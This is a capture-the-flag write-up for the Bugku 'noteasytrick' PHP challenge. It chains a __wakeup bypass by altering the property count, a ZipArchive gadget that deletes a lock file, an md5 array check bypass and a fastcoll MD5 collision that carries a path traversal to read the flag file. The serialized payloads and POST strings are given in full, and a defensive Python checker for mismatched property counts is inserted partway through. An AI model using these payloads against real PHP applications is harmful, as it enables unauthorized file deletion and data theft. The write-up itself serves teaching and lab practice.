Bugku noteasytrick

Opening the challenge environment shows the source:

<?php
error_reporting(0);
ini_set("display_errors","Off");
class Jesen {
    public $filename;
    public $content;
    public $me;

    function __wakeup(){
        $this->me = new Ctf();
    }
    function __destruct() {
        $this->me->open($this->filename,$this->content);
    }
}

class Ctf {
    function __toString() {
        return "die";
    }
    function open($filename, $content){
        if(!file_get_contents("./sandbox/lock.lock")){
            echo file_get_contents(substr($_POST['b'],0,30));
            die();
        }else{
            file_put_contents("./sandbox/".md5($filename.time()),$content);
            die("or you can guess the final filename?"); 
        }
        
    }
}

if(!isset($_POST['a'])){
    highlight_file(__FILE__);
    die();
}else{
    if(($_POST['b'] != $_POST['a']) && (md5($_POST['b']) === md5($_POST['a']))){
        unserialize($_POST['c']);
    }

}

Step one: we need to bypass __wakeup(), because it replaces $me with a Ctf object before __destruct() runs.
Then, inside open(), if the file ./sandbox/lock.lock exists we go to the else branch. Trying to access that file shows that it does exist, so we land in else.
The else branch obviously wants us to guess the filename,
but the filename is an md5 hash (of $filename concatenated with time()).

So instead of guessing, we delete lock.lock: once it is gone, file_get_contents() returns false and the first branch runs, which reads the file named by the first 30 bytes of $_POST['b']. Running the script below produces the serialized object that does the deletion, and we then submit it.

<?php
class Jesen {
    public $filename = './sandbox/lock.lock';
    public $content = 8;   // 8 == ZipArchive::OVERWRITE
    public $me;
}

$a = new Jesen();
// __destruct() calls $this->me->open($filename, $content). With $me swapped for a
// ZipArchive this becomes ZipArchive::open('./sandbox/lock.lock', OVERWRITE);
// the truncated, now-empty archive is removed when the object is closed,
// which deletes lock.lock.
$zip = new ZipArchive;
$a->me = $zip;
$b = serialize($a);
// Bump the declared property count from 3 to 4 so that __wakeup() is skipped
// and $me is not replaced with a Ctf object.
$b = str_replace('":3:', '":4:', $b);
echo $b;
echo "\n";

Then POST it. Passing a and b as arrays (a[]=1&b[]=2) gets past the check in line 41: the arrays are unequal, and md5() of an array yields NULL on the old PHP this challenge runs, so md5(b) === md5(a) holds.

a[]=1&b[]=2&c=O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";s:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";s:0:"";s:7:"comment";s:0:"";}}
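As an added example (not part of the writeup), a small Python checker that a defender could run on serialized input before it ever reaches unserialize(): it parses the PHP serialize() format used above and flags every object whose declared property count differs from the properties actually present, the mismatch that makes older PHP skip __wakeup(). The two inputs are the payload above and the plain Jesen object used later in the writeup, embedded as constants.

```python
import re

# Constructed inputs: the two serialized objects POSTed in this writeup. The first
# declares 4 properties for Jesen but carries only 3; the second is well formed.
BYPASS_PAYLOAD = ('O:5:"Jesen":4:{s:8:"filename";s:19:"./sandbox/lock.lock";'
                  's:7:"content";i:8;s:2:"me";O:10:"ZipArchive":5:{s:6:"status";'
                  'i:0;s:9:"statusSys";i:0;s:8:"numFiles";i:0;s:8:"filename";'
                  's:0:"";s:7:"comment";s:0:"";}}')
PLAIN_PAYLOAD = 'O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}'
OBJ_HEADER = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')

def parse(data, pos=0):
    """Parse one PHP serialize() value at pos and return (value, next_pos).
    Supports N, i, s and O; objects become dicts (class, declared count, props)."""
    tag = data[pos]
    if tag == 'N':                                    # N;
        return None, pos + 2
    if tag == 'i':                                    # i:<int>;
        end = data.index(';', pos)
        return int(data[pos + 2:end]), end + 1
    if tag == 's':                                    # s:<len>:"<bytes>";
        colon = data.index(':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2                             # skip ':"'
        return data[start:start + length], start + length + 2  # skip '";'
    if tag == 'O':                                    # O:<len>:"<class>":<n>:{...}
        m = OBJ_HEADER.match(data, pos)
        if m is None:
            raise ValueError(f'malformed object header at offset {pos}')
        props, pos = {}, m.end()
        while data[pos] != '}':
            key, pos = parse(data, pos)               # property name
            props[key], pos = parse(data, pos)        # property value, may nest
        return {'class': m.group(2), 'declared': int(m.group(3)), 'props': props}, pos + 1
    raise ValueError(f'unsupported type {tag!r} at offset {pos}')

def wakeup_bypass_suspects(value):
    """Class names whose declared property count differs from the properties present,
    nested objects included. Older PHP skips __wakeup() for such objects."""
    found = []
    if isinstance(value, dict):
        if value['declared'] != len(value['props']):
            found.append(value['class'])
        for child in value['props'].values():
            found.extend(wakeup_bypass_suspects(child))
    return found

def check_payload(serialized):
    return wakeup_bypass_suspects(parse(serialized)[0])
```

Rejecting such input (or, better, never calling unserialize() on user data) closes the first step of this exploit chain regardless of PHP version.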

Next we use the fastcoll tool to generate two different files with the same md5 that both start with this prefix:

./../../../../../../../../flag

The prefix is exactly 30 bytes, which is what substr($_POST['b'],0,30) keeps, so the collision blocks fastcoll appends never reach file_get_contents().

This produces two files.
I was still not sure whether it had worked,
so I checked with a PHP script:

<?php
function readmyfile($path) {
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}
echo md5(readmyfile("1.txt"));
echo '============================';
//echo urlencode(readmyfile("1.txt"));
echo md5(readmyfile("2.txt"));
//echo '============================';
//echo urlencode(readmyfile("2.txt"));

Run it:

The two hashes are indeed identical,
so we can URL-encode the files directly:

<?php
function readmyfile($path) {
    $fh = fopen($path, "rb");
    $data = fread($fh, filesize($path));
    fclose($fh);
    return $data;
}
//echo md5(readmyfile("1.txt"));
//echo '============================';
echo urlencode(readmyfile("1.txt"));
//echo md5(readmyfile("2.txt"));
echo '============================';
echo urlencode(readmyfile("2.txt"));

Now that we have a and b, we still need the value of c. This time a plain Jesen object is enough: __wakeup() may run, because the Ctf it creates is exactly the object whose open() we want called, and with lock.lock gone open() reads the file named by the first 30 bytes of b.

<?php
class Jesen {
    public $filename;
    public $content;
    public $me;
}

$a = new Jesen();
echo serialize($a);

Then POST these parameters and we get the flag:

a=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9F%EA%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FFe%A1_%3A%F1Dg%9Fh%858%84%9Fdj%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%9B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%E0%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2iL%8C%F8%BD&b=.%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fflag%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%9B%BC%F2%25o%E6W%DD%A5%DBB%2F%19%95%D6%9F%2AH%9Fj%0F%FE%D1%D3%FC9%3F%C9%10%92%94%EB%03%B5%F0%E5%E3e%1E%C1o.%C7b%FF%E5%A1_%3A%F1Dg%9Fh%858%84%9Fd%EA%E5%82%03%19l%CA%E4%BB%E3%0F+%968%18%81.%25n%7E%A2u%10%D7%1B%FE%CB%1Cn%7E%DF%EF%CF%5BP%A5A%A8%EF%B4%A9%14%CA%AA%5E%2A%91%EB0k%60%CF%E6%1E%8EL%FF%81-%E41%0F%FF%B2%E9L%8C%F8%BD&c=O:5:"Jesen":3:{s:8:"filename";N;s:7:"content";N;s:2:"me";N;}

Flag obtained.

Leave a comment if anything is unclear.
